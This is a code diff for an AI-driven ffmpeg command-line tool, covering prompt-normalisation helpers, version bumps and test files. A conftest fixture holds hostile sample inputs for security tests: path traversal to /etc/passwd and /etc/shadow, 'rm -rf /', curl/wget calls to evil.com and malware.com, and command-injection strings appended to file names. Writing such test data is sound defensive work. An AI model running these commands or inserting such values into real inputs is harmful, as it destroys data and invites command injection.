prompt: Current enhanced prompt
|
||||
|
||||
Returns:
|
||||
Prompt with normalized terms
|
||||
"""
|
||||
# Normalize aspect ratio formatting (remove spaces around colons)
|
||||
prompt = re.sub(r"\b(\d+)\s*:\s*(\d+)\b", r"\1:\2", prompt)
|
||||
|
||||
# Normalize resolution formatting (remove spaces around 'x')
|
||||
prompt = re.sub(r"\b(\d{3,4})\s*[xX]\s*(\d{3,4})\b", r"\1x\2", prompt)
|
||||
|
||||
# Expand common abbreviations to full terms
|
||||
replacements = {
|
||||
"vid": "video",
|
||||
"aud": "audio",
|
||||
"sub": "subtitle",
|
||||
"cap": "caption",
|
||||
"res": "resolution",
|
||||
"fps": "frame rate",
|
||||
"bitrate": "bit rate",
|
||||
"codec": "encoding format",
|
||||
}
|
||||
|
||||
for abbrev, full in replacements.items():
|
||||
prompt = re.sub(rf"\b{abbrev}\b", full, prompt, flags=re.IGNORECASE)
|
||||
|
||||
return prompt
|
||||
|
||||
def suggest_improvements(self, prompt: str) -> list[str]:
|
||||
"""Suggest improvements for a given prompt.
|
||||
|
||||
Analyzes the prompt for common issues that could lead to
|
||||
inaccurate or incomplete ffmpeg command generation.
|
||||
|
||||
Args:
|
||||
prompt: User prompt to analyze
|
||||
|
||||
Returns:
|
||||
List of improvement suggestions as strings
|
||||
"""
|
||||
suggestions = []
|
||||
|
||||
# Check for vague terms that lack specificity
|
||||
vague_terms = ["better", "good", "nice", "proper", "correct", "right"]
|
||||
for term in vague_terms:
|
||||
if term in prompt.lower():
|
||||
suggestions.append(
|
||||
f"Replace '{term}' with specific requirements (e.g., 'high quality', 'small file size')"
|
||||
)
|
||||
|
||||
# Check for missing file format specifications
|
||||
if "file" in prompt.lower() and not re.search(r"\.[a-zA-Z0-9]+", prompt):
|
||||
suggestions.append("Specify file format (e.g., .mp4, .avi)")
|
||||
|
||||
# Check for missing quality specifications when quality is mentioned
|
||||
if "quality" in prompt.lower() and "crf" not in prompt.lower():
|
||||
suggestions.append("Specify quality level (e.g., 'high quality', 'small file size')")
|
||||
|
||||
# Check for missing aspect ratio when resizing operations are mentioned
|
||||
if any(word in prompt.lower() for word in ["resize", "scale", "convert"]) and not re.search(
|
||||
r"\d+:\d+", prompt
|
||||
):
|
||||
suggestions.append("Specify target aspect ratio (e.g., '16:9', '9:16', '1:1')")
|
||||
|
||||
return suggestions
|
||||
|
||||
|
||||
def enhance_user_prompt(prompt: str, context: dict[str, Any]) -> str:
|
||||
"""Convenience function to enhance a user prompt.
|
||||
|
||||
Creates a PromptEnhancer instance and applies enhancement to the
|
||||
given prompt. Use this for one-off prompt enhancement.
|
||||
|
||||
Args:
|
||||
prompt: Original user prompt string
|
||||
context: File context information dictionary
|
||||
|
||||
Returns:
|
||||
Enhanced prompt string
|
||||
"""
|
||||
enhancer = PromptEnhancer()
|
||||
return enhancer.enhance_prompt(prompt, context)
|
||||
|
||||
|
||||
def get_prompt_suggestions(prompt: str) -> list[str]:
|
||||
"""Get suggestions for improving a user prompt.
|
||||
|
||||
Creates a PromptEnhancer instance and analyzes the prompt for
|
||||
potential improvements. Use this for providing user feedback.
|
||||
|
||||
Args:
|
||||
prompt: User prompt string to analyze
|
||||
|
||||
Returns:
|
||||
List of improvement suggestions as strings
|
||||
"""
|
||||
enhancer = PromptEnhancer()
|
||||
return enhancer.suggest_improvements(prompt)
|
||||
@@ -1 +0,0 @@
|
||||
__version__ = "0.1.4"
|
||||
@@ -4,4 +4,6 @@ This module provides the current version number for the ai-ffmpeg-cli package.
|
||||
The version follows semantic versioning (MAJOR.MINOR.PATCH).
|
||||
"""
|
||||
|
||||
# Current version of the ai-ffmpeg-cli package
|
||||
# Follows semantic versioning: MAJOR.MINOR.PATCH
|
||||
__version__ = "0.2.2"
|
||||
272
tests/conftest.py
Normal file
272
tests/conftest.py
Normal file
@@ -0,0 +1,272 @@
|
||||
"""Test configuration and shared fixtures for ai-ffmpeg-cli.
|
||||
|
||||
This module provides shared test fixtures, configuration, and utilities
|
||||
that can be used across all test modules.
|
||||
"""
|
||||
|
||||
import os
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import Mock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from ai_ffmpeg_cli.config import AppConfig
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent, Action
|
||||
from ai_ffmpeg_cli.llm_client import LLMClient
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def temp_dir():
|
||||
"""Create a temporary directory for test files."""
|
||||
with tempfile.TemporaryDirectory() as temp_dir:
|
||||
yield Path(temp_dir)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_video_files(temp_dir):
|
||||
"""Create sample video files for testing."""
|
||||
video_files = []
|
||||
for i in range(3):
|
||||
video_file = temp_dir / f"video_{i}.mp4"
|
||||
video_file.write_text(f"fake video content {i}")
|
||||
video_files.append(video_file)
|
||||
return video_files
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_audio_files(temp_dir):
|
||||
"""Create sample audio files for testing."""
|
||||
audio_files = []
|
||||
for i in range(2):
|
||||
audio_file = temp_dir / f"audio_{i}.mp3"
|
||||
audio_file.write_text(f"fake audio content {i}")
|
||||
audio_files.append(audio_file)
|
||||
return audio_files
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_image_files(temp_dir):
|
||||
"""Create sample image files for testing."""
|
||||
image_files = []
|
||||
for i in range(2):
|
||||
image_file = temp_dir / f"image_{i}.jpg"
|
||||
image_file.write_text(f"fake image content {i}")
|
||||
image_files.append(image_file)
|
||||
return image_files
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_config():
|
||||
"""Create a mock configuration for testing."""
|
||||
config = Mock(spec=AppConfig)
|
||||
config.model = "gpt-4o"
|
||||
config.dry_run = True
|
||||
config.timeout = 60
|
||||
config.allowed_dirs = [Path("/tmp")]
|
||||
config.assume_yes = False
|
||||
config.verbose = False
|
||||
config.output_dir = None
|
||||
return config
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_llm_client():
|
||||
"""Create a mock LLM client for testing."""
|
||||
client = Mock(spec=LLMClient)
|
||||
client.parse.return_value = FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[Path("test.mp4")],
|
||||
output=Path("output.mp4"),
|
||||
format="mp4",
|
||||
)
|
||||
return client
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def sample_intent():
|
||||
"""Create a sample FFmpeg intent for testing."""
|
||||
return FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[Path("input.mp4")],
|
||||
output=Path("output.mp4"),
|
||||
format="mp4",
|
||||
video_codec="libx264",
|
||||
audio_codec="aac",
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_context():
|
||||
"""Create a mock context for testing."""
|
||||
return {
|
||||
"videos": ["/path/to/video1.mp4", "/path/to/video2.mov"],
|
||||
"audios": ["/path/to/audio1.mp3"],
|
||||
"images": ["/path/to/image1.jpg"],
|
||||
"most_recent_video": "/path/to/video1.mp4",
|
||||
}
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def cli_runner():
|
||||
"""Create a CLI runner for testing."""
|
||||
from typer.testing import CliRunner
|
||||
|
||||
return CliRunner()
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_ffmpeg():
|
||||
"""Mock FFmpeg execution."""
|
||||
with patch("subprocess.run") as mock_run:
|
||||
mock_run.return_value.returncode = 0
|
||||
mock_run.return_value.stdout = b"FFmpeg output"
|
||||
mock_run.return_value.stderr = b""
|
||||
yield mock_run
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_openai():
|
||||
"""Mock OpenAI API calls."""
|
||||
with patch("openai.OpenAI") as mock_client_class:
|
||||
mock_client = Mock()
|
||||
mock_client.chat.completions.create.return_value.choices[0].message.content = (
|
||||
'{"action": "convert", "inputs": ["test.mp4"], "output": "output.mp4", "format": "mp4"}'
|
||||
)
|
||||
mock_client_class.return_value = mock_client
|
||||
yield mock_client
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_file_system(temp_dir):
|
||||
"""Mock file system operations."""
|
||||
with (
|
||||
patch("pathlib.Path.exists", return_value=True),
|
||||
patch("pathlib.Path.is_file", return_value=True),
|
||||
patch("pathlib.Path.is_dir", return_value=False),
|
||||
):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_user_input():
|
||||
"""Mock user input for interactive tests."""
|
||||
with patch("builtins.input", return_value="y"):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_logging():
|
||||
"""Mock logging for tests."""
|
||||
with patch("ai_ffmpeg_cli.logging_config.config.setup_logging"):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def test_environment():
|
||||
"""Set up test environment variables."""
|
||||
original_env = os.environ.copy()
|
||||
os.environ["OPENAI_API_KEY"] = "test-api-key"
|
||||
os.environ["AICLIP_CONFIG_DIR"] = str(Path.cwd() / "test_config")
|
||||
yield
|
||||
os.environ.clear()
|
||||
os.environ.update(original_env)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_credential_security():
|
||||
"""Mock credential security functions."""
|
||||
with (
|
||||
patch(
|
||||
"ai_ffmpeg_cli.credential_security.validate_api_key_format",
|
||||
return_value=True,
|
||||
),
|
||||
patch("ai_ffmpeg_cli.credential_security.mask_api_key", return_value="sk-***"),
|
||||
):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_path_security():
|
||||
"""Mock path security functions."""
|
||||
with (
|
||||
patch("ai_ffmpeg_cli.path_security.is_safe_path", return_value=True),
|
||||
patch("ai_ffmpeg_cli.path_security.validate_ffmpeg_command", return_value=True),
|
||||
):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def performance_test_data():
|
||||
"""Create test data for performance tests."""
|
||||
return {
|
||||
"large_video": b"x" * (100 * 1024 * 1024), # 100MB
|
||||
"many_files": [f"file_{i}.mp4" for i in range(1000)],
|
||||
"complex_intent": FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[Path(f"input_{i}.mp4") for i in range(10)],
|
||||
output=Path("output.mp4"),
|
||||
format="mp4",
|
||||
video_codec="libx264",
|
||||
audio_codec="aac",
|
||||
filters=["scale=1920:1080", "fps=30"],
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def security_test_data():
|
||||
"""Create test data for security tests."""
|
||||
return {
|
||||
"dangerous_paths": [
|
||||
"../../../etc/passwd",
|
||||
"..\\..\\windows\\system32",
|
||||
"/etc/shadow",
|
||||
"C:\\Windows\\System32\\cmd.exe",
|
||||
],
|
||||
"dangerous_commands": [
|
||||
["rm", "-rf", "/"],
|
||||
["curl", "http://evil.com"],
|
||||
["wget", "http://malware.com"],
|
||||
],
|
||||
"injection_attempts": [
|
||||
"input.mp4; rm -rf /",
|
||||
"input.mp4 | curl evil.com",
|
||||
"input.mp4 && wget malware.com",
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
# Test markers for different test categories
|
||||
def pytest_configure(config):
|
||||
"""Configure pytest with custom markers."""
|
||||
config.addinivalue_line("markers", "unit: mark test as a unit test")
|
||||
config.addinivalue_line("markers", "integration: mark test as an integration test")
|
||||
config.addinivalue_line("markers", "e2e: mark test as an end-to-end test")
|
||||
config.addinivalue_line("markers", "performance: mark test as a performance test")
|
||||
config.addinivalue_line("markers", "security: mark test as a security test")
|
||||
config.addinivalue_line("markers", "slow: mark test as slow running")
|
||||
config.addinivalue_line("markers", "fast: mark test as fast running")
|
||||
|
||||
|
||||
# Test collection configuration
|
||||
def pytest_collection_modifyitems(config, items):
|
||||
"""Modify test collection to add markers based on file location."""
|
||||
for item in items:
|
||||
# Add markers based on test file location
|
||||
if "unit/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.unit)
|
||||
elif "integration/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.integration)
|
||||
elif "e2e/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.e2e)
|
||||
elif "performance/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.performance)
|
||||
elif "security/" in str(item.fspath):
|
||||
item.add_marker(pytest.mark.security)
|
||||
|
||||
# Add speed markers based on test name
|
||||
if "performance" in item.name or "load" in item.name or "memory" in item.name:
|
||||
item.add_marker(pytest.mark.slow)
|
||||
else:
|
||||
item.add_marker(pytest.mark.fast)
|
||||
5
tests/e2e/__init__.py
Normal file
5
tests/e2e/__init__.py
Normal file
@@ -0,0 +1,5 @@
|
||||
"""End-to-end tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains end-to-end tests that verify complete workflows.
|
||||
E2E tests focus on testing the entire application from user input to output.
|
||||
"""
|
||||
@@ -7,7 +7,7 @@ from unittest.mock import patch
|
||||
import pytest
|
||||
import typer
|
||||
|
||||
from ai_ffmpeg_cli.errors import ConfigError
|
||||
from ai_ffmpeg_cli.custom_exceptions import ConfigError
|
||||
from ai_ffmpeg_cli.main import _make_llm
|
||||
from ai_ffmpeg_cli.main import main
|
||||
|
||||
@@ -61,8 +61,8 @@ class TestMainCLI:
|
||||
):
|
||||
"""Test one-shot mode with successful execution."""
|
||||
from ai_ffmpeg_cli.config import AppConfig
|
||||
from ai_ffmpeg_cli.nl_schema import Action
|
||||
from ai_ffmpeg_cli.nl_schema import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
|
||||
# Setup mocks
|
||||
config = AppConfig(openai_api_key="test-key", dry_run=False)
|
||||
@@ -104,7 +104,7 @@ class TestMainCLI:
|
||||
def test_one_shot_mode_parse_error(self, mock_make_llm, mock_scan, mock_load_config):
|
||||
"""Test one-shot mode with parsing error."""
|
||||
from ai_ffmpeg_cli.config import AppConfig
|
||||
from ai_ffmpeg_cli.errors import ParseError
|
||||
from ai_ffmpeg_cli.custom_exceptions import ParseError
|
||||
|
||||
# Setup mocks
|
||||
config = AppConfig(openai_api_key="test-key")
|
||||
@@ -132,7 +132,7 @@ class TestMainCLI:
|
||||
@patch("ai_ffmpeg_cli.main.load_config")
|
||||
def test_config_error(self, mock_load_config):
|
||||
"""Test configuration error handling."""
|
||||
from ai_ffmpeg_cli.errors import ConfigError
|
||||
from ai_ffmpeg_cli.custom_exceptions import ConfigError
|
||||
|
||||
mock_load_config.side_effect = ConfigError("Config failed")
|
||||
|
||||
@@ -152,7 +152,14 @@ class TestMainCLI:
|
||||
def test_model_parameter_validation(self):
|
||||
"""Test that model parameter validation works."""
|
||||
# This is a simpler test that doesn't require complex mocking
|
||||
valid_models = ["gpt-4o", "gpt-4o-mini", "gpt-3.5-turbo"]
|
||||
valid_models = [
|
||||
"gpt-5",
|
||||
"gpt-5-mini",
|
||||
"gpt-5-nano",
|
||||
"gpt-4o",
|
||||
"gpt-4o-mini",
|
||||
"gpt-3.5-turbo",
|
||||
]
|
||||
|
||||
# Test that these are valid model names (basic validation)
|
||||
for model in valid_models:
|
||||
5
tests/fixtures/__init__.py
vendored
Normal file
5
tests/fixtures/__init__.py
vendored
Normal file
@@ -0,0 +1,5 @@
|
||||
"""Test fixtures for ai-ffmpeg-cli.
|
||||
|
||||
This package contains shared test fixtures and utilities.
|
||||
Fixtures provide reusable test data and setup for multiple test modules.
|
||||
"""
|
||||
5
tests/integration/__init__.py
Normal file
5
tests/integration/__init__.py
Normal file
@@ -0,0 +1,5 @@
|
||||
"""Integration tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains integration tests that verify component interactions.
|
||||
Integration tests focus on testing how multiple components work together.
|
||||
"""
|
||||
@@ -8,16 +8,15 @@ This module tests the new features that were implemented to fix cookbook command
|
||||
- New action types (extract_frames, format_convert)
|
||||
"""
|
||||
|
||||
import json
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import Mock, patch
|
||||
from unittest.mock import Mock
|
||||
|
||||
import pytest
|
||||
|
||||
from ai_ffmpeg_cli.intent_models_extended import Action
|
||||
from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import route_intent
|
||||
from ai_ffmpeg_cli.llm_client import LLMClient, OpenAIProvider
|
||||
from ai_ffmpeg_cli.intent_schema import Action, FfmpegIntent
|
||||
from ai_ffmpeg_cli.llm_client import LLMClient
|
||||
|
||||
|
||||
class TestFormatConversion:
|
||||
@@ -162,7 +161,7 @@ class TestEnhancedScaling:
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert "-vf" in entry.args
|
||||
assert "scale=iw*0.5:ih*0.5" in entry.args
|
||||
assert "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease" in entry.args
|
||||
|
||||
def test_specific_resolution_scaling_intent(self):
|
||||
"""Test specific resolution scaling intent routing."""
|
||||
@@ -179,7 +178,7 @@ class TestEnhancedScaling:
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert "-vf" in entry.args
|
||||
assert "scale=1920:1080" in entry.args
|
||||
assert "scale=1920:1080:force_original_aspect_ratio=decrease" in entry.args
|
||||
|
||||
def test_enhanced_convert_with_filters(self):
|
||||
"""Test enhanced convert with multiple filters."""
|
||||
@@ -196,7 +195,7 @@ class TestEnhancedScaling:
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert "-vf" in entry.args
|
||||
assert "scale=1280:720,fps=30" in entry.args
|
||||
assert "fps=30,scale=1280:720:force_original_aspect_ratio=decrease" in entry.args
|
||||
|
||||
|
||||
class TestEnhancedRemoveAudio:
|
||||
@@ -265,7 +264,9 @@ class TestLLMResponseFixing:
|
||||
"""Test fixing null filters in LLM response."""
|
||||
client = LLMClient(Mock())
|
||||
|
||||
response = '{"action": "convert", "inputs": ["test.mp4"], "filters": null, "extra_flags": []}'
|
||||
response = (
|
||||
'{"action": "convert", "inputs": ["test.mp4"], "filters": null, "extra_flags": []}'
|
||||
)
|
||||
fixed = client._fix_common_issues(response)
|
||||
|
||||
assert '"filters": []' in fixed
|
||||
@@ -275,7 +276,9 @@ class TestLLMResponseFixing:
|
||||
"""Test fixing null extra_flags in LLM response."""
|
||||
client = LLMClient(Mock())
|
||||
|
||||
response = '{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": null}'
|
||||
response = (
|
||||
'{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": null}'
|
||||
)
|
||||
fixed = client._fix_common_issues(response)
|
||||
|
||||
assert '"extra_flags": []' in fixed
|
||||
@@ -285,9 +288,7 @@ class TestLLMResponseFixing:
|
||||
"""Test fixing null inputs in LLM response."""
|
||||
client = LLMClient(Mock())
|
||||
|
||||
response = (
|
||||
'{"action": "convert", "inputs": null, "filters": [], "extra_flags": []}'
|
||||
)
|
||||
response = '{"action": "convert", "inputs": null, "filters": [], "extra_flags": []}'
|
||||
fixed = client._fix_common_issues(response)
|
||||
|
||||
assert '"inputs": []' in fixed
|
||||
@@ -309,7 +310,9 @@ class TestLLMResponseFixing:
|
||||
"""Test fixing missing array brackets for extra_flags."""
|
||||
client = LLMClient(Mock())
|
||||
|
||||
response = '{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": "-y"}'
|
||||
response = (
|
||||
'{"action": "convert", "inputs": ["test.mp4"], "filters": [], "extra_flags": "-y"}'
|
||||
)
|
||||
fixed = client._fix_common_issues(response)
|
||||
|
||||
# The regex replacement might add extra brackets, so we check for the pattern
|
||||
@@ -346,9 +349,7 @@ class TestSchemaValidation:
|
||||
|
||||
def test_format_convert_validation(self):
|
||||
"""Test format_convert validation requires format parameter."""
|
||||
with pytest.raises(
|
||||
ValueError, match="format_convert requires format parameter"
|
||||
):
|
||||
with pytest.raises(ValueError, match="format_convert requires format parameter"):
|
||||
FfmpegIntent(
|
||||
action=Action.format_convert,
|
||||
inputs=[Path("test.mp4")],
|
||||
@@ -457,7 +458,7 @@ class TestIntegrationScenarios:
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert "-vf" in entry.args
|
||||
assert "scale=iw*0.5:ih*0.5" in entry.args
|
||||
assert "scale=iw*0.5:ih*0.5:force_original_aspect_ratio=decrease" in entry.args
|
||||
assert "-c:v" in entry.args
|
||||
assert "libx264" in entry.args
|
||||
assert "-c:a" in entry.args
|
||||
@@ -489,9 +490,7 @@ class TestErrorHandling:
|
||||
|
||||
def test_missing_format_error_message(self):
|
||||
"""Test that missing format gives clear error message."""
|
||||
with pytest.raises(
|
||||
ValueError, match="format_convert requires format parameter"
|
||||
):
|
||||
with pytest.raises(ValueError, match="format_convert requires format parameter"):
|
||||
FfmpegIntent(
|
||||
action=Action.format_convert,
|
||||
inputs=[Path("test.mp4")],
|
||||
@@ -8,7 +8,7 @@ from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from ai_ffmpeg_cli.errors import ExecError
|
||||
from ai_ffmpeg_cli.custom_exceptions import ExecError
|
||||
from ai_ffmpeg_cli.executor import _check_overwrite_protection
|
||||
from ai_ffmpeg_cli.executor import _extract_output_path
|
||||
from ai_ffmpeg_cli.executor import _format_command
|
||||
@@ -123,7 +123,7 @@ class TestCheckOverwriteProtection:
|
||||
assert result is True
|
||||
|
||||
@patch("ai_ffmpeg_cli.executor.confirm_prompt")
|
||||
@patch("ai_ffmpeg_cli.executor.Console")
|
||||
@patch("ai_ffmpeg_cli.executor.console")
|
||||
def test_existing_files_confirm_yes(self, mock_console, mock_confirm, tmp_path):
|
||||
"""Test with existing files and user confirms overwrite."""
|
||||
output_file = tmp_path / "existing.mp4"
|
||||
@@ -140,7 +140,7 @@ class TestCheckOverwriteProtection:
|
||||
)
|
||||
|
||||
@patch("ai_ffmpeg_cli.executor.confirm_prompt")
|
||||
@patch("ai_ffmpeg_cli.executor.Console")
|
||||
@patch("ai_ffmpeg_cli.executor.console")
|
||||
def test_existing_files_confirm_no(self, mock_console, mock_confirm, tmp_path):
|
||||
"""Test with existing files and user declines overwrite."""
|
||||
output_file = tmp_path / "existing.mp4"
|
||||
@@ -154,7 +154,7 @@ class TestCheckOverwriteProtection:
|
||||
assert result is False
|
||||
|
||||
@patch("ai_ffmpeg_cli.executor.confirm_prompt")
|
||||
@patch("ai_ffmpeg_cli.executor.Console")
|
||||
@patch("ai_ffmpeg_cli.executor.console")
|
||||
def test_multiple_existing_files(self, mock_console, mock_confirm, tmp_path):
|
||||
"""Test with multiple existing files."""
|
||||
output1 = tmp_path / "existing1.mp4"
|
||||
@@ -172,7 +172,7 @@ class TestCheckOverwriteProtection:
|
||||
|
||||
assert result is True
|
||||
# Should show both files in warning
|
||||
mock_console.return_value.print.assert_called()
|
||||
mock_console.print.assert_called()
|
||||
|
||||
def test_mixed_existing_nonexisting_files(self, tmp_path):
|
||||
"""Test with mix of existing and non-existing files."""
|
||||
@@ -185,8 +185,10 @@ class TestCheckOverwriteProtection:
|
||||
]
|
||||
|
||||
with (
|
||||
patch("ai_ffmpeg_cli.executor.confirm_prompt", return_value=True) as mock_confirm,
|
||||
patch("ai_ffmpeg_cli.executor.Console"),
|
||||
patch(
|
||||
"ai_ffmpeg_cli.executor.confirm_prompt", return_value=True
|
||||
) as mock_confirm,
|
||||
patch("ai_ffmpeg_cli.executor.console"),
|
||||
):
|
||||
result = _check_overwrite_protection(commands, assume_yes=False)
|
||||
|
||||
@@ -198,18 +200,16 @@ class TestCheckOverwriteProtection:
|
||||
class TestPreview:
|
||||
"""Test command preview functionality."""
|
||||
|
||||
@patch("ai_ffmpeg_cli.executor.Console")
|
||||
@patch("ai_ffmpeg_cli.executor.console")
|
||||
def test_preview_single_command(self, mock_console):
|
||||
"""Test previewing single command."""
|
||||
commands = [["ffmpeg", "-i", "input.mp4", "output.mp4"]]
|
||||
|
||||
preview(commands)
|
||||
|
||||
mock_console.assert_called_once()
|
||||
console_instance = mock_console.return_value
|
||||
console_instance.print.assert_called_once()
|
||||
mock_console.print.assert_called()
|
||||
|
||||
@patch("ai_ffmpeg_cli.executor.Console")
|
||||
@patch("ai_ffmpeg_cli.executor.console")
|
||||
def test_preview_multiple_commands(self, mock_console):
|
||||
"""Test previewing multiple commands."""
|
||||
commands = [
|
||||
@@ -220,12 +220,10 @@ class TestPreview:
|
||||
|
||||
preview(commands)
|
||||
|
||||
mock_console.assert_called_once()
|
||||
console_instance = mock_console.return_value
|
||||
console_instance.print.assert_called_once()
|
||||
mock_console.print.assert_called()
|
||||
|
||||
# Table should be created with correct number of rows (assert print called)
|
||||
assert console_instance.print.called
|
||||
assert mock_console.print.called
|
||||
|
||||
|
||||
class TestRun:
|
||||
@@ -254,7 +252,9 @@ class TestRun:
|
||||
@patch("ai_ffmpeg_cli.executor.preview")
|
||||
@patch("ai_ffmpeg_cli.executor._check_overwrite_protection")
|
||||
@patch("ai_ffmpeg_cli.executor.subprocess.run")
|
||||
def test_run_successful_execution(self, mock_subprocess, mock_overwrite, mock_preview):
|
||||
def test_run_successful_execution(
|
||||
self, mock_subprocess, mock_overwrite, mock_preview
|
||||
):
|
||||
"""Test successful command execution."""
|
||||
commands = [["ffmpeg", "-i", "input.mp4", "output.mp4"]]
|
||||
mock_overwrite.return_value = True
|
||||
@@ -262,7 +262,9 @@ class TestRun:
|
||||
mock_result.returncode = 0
|
||||
mock_subprocess.return_value = mock_result
|
||||
|
||||
result = run(commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False)
|
||||
result = run(
|
||||
commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False
|
||||
)
|
||||
|
||||
assert result == 0
|
||||
mock_subprocess.assert_called_once_with(commands[0], check=True)
|
||||
@@ -275,7 +277,9 @@ class TestRun:
|
||||
commands = [["ffmpeg", "-i", "input.mp4", "output.mp4"]]
|
||||
mock_overwrite.return_value = False
|
||||
|
||||
result = run(commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False)
|
||||
result = run(
|
||||
commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False
|
||||
)
|
||||
|
||||
assert result == 1 # Cancelled
|
||||
|
||||
@@ -313,7 +317,9 @@ class TestRun:
|
||||
mock_result.returncode = 0
|
||||
mock_subprocess.return_value = mock_result
|
||||
|
||||
result = run(commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False)
|
||||
result = run(
|
||||
commands, confirm=True, dry_run=False, show_preview=True, assume_yes=False
|
||||
)
|
||||
|
||||
assert result == 0
|
||||
assert mock_subprocess.call_count == 2
|
||||
@@ -324,7 +330,9 @@ class TestRun:
|
||||
@patch("ai_ffmpeg_cli.executor.preview")
|
||||
@patch("ai_ffmpeg_cli.executor._check_overwrite_protection")
|
||||
@patch("ai_ffmpeg_cli.executor.subprocess.run")
|
||||
def test_run_second_command_fails(self, mock_subprocess, mock_overwrite, mock_preview):
|
||||
def test_run_second_command_fails(
|
||||
self, mock_subprocess, mock_overwrite, mock_preview
|
||||
):
|
||||
"""Test when second command fails."""
|
||||
commands = [
|
||||
["ffmpeg", "-i", "input1.mp4", "output1.mp4"],
|
||||
@@ -372,7 +380,11 @@ class TestRun:
|
||||
mock_result.returncode = 0
|
||||
mock_subprocess.return_value = mock_result
|
||||
|
||||
result = run(commands, confirm=True, dry_run=False, show_preview=False, assume_yes=True)
|
||||
result = run(
|
||||
commands, confirm=True, dry_run=False, show_preview=False, assume_yes=True
|
||||
)
|
||||
|
||||
assert result == 0
|
||||
mock_overwrite.assert_called_once_with(commands, True) # assume_yes passed through
|
||||
mock_overwrite.assert_called_once_with(
|
||||
commands, True
|
||||
) # assume_yes passed through
|
||||
125
tests/integration/test_gif_conversion.py
Normal file
125
tests/integration/test_gif_conversion.py
Normal file
@@ -0,0 +1,125 @@
|
||||
"""Integration tests for GIF conversion functionality."""
|
||||
|
||||
import pytest
|
||||
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import route_intent
|
||||
|
||||
|
||||
class TestGifConversion:
|
||||
"""Test GIF conversion functionality."""
|
||||
|
||||
def test_gif_conversion_intent_creation(self):
|
||||
"""Test that GIF conversion creates the correct intent."""
|
||||
intent_data = {
|
||||
"action": "convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"filters": "fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
|
||||
assert intent.action == Action.convert
|
||||
assert intent.filters == [
|
||||
"fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse"
|
||||
]
|
||||
assert len(intent.inputs) == 1
|
||||
assert str(intent.inputs[0]) == "/path/to/test.mp4"
|
||||
|
||||
def test_format_convert_requires_format_parameter(self):
|
||||
"""Test that format_convert action requires format parameter."""
|
||||
# This should fail
|
||||
intent_data = {
|
||||
"action": "format_convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
# Missing format parameter
|
||||
}
|
||||
|
||||
with pytest.raises(ValueError, match="format_convert requires format parameter"):
|
||||
FfmpegIntent(**intent_data)
|
||||
|
||||
def test_format_convert_with_format_parameter(self):
|
||||
"""Test that format_convert works with format parameter."""
|
||||
intent_data = {
|
||||
"action": "format_convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"format": "gif",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
assert intent.action == Action.format_convert
|
||||
assert intent.format == "gif"
|
||||
|
||||
def test_convert_action_does_not_require_format(self):
|
||||
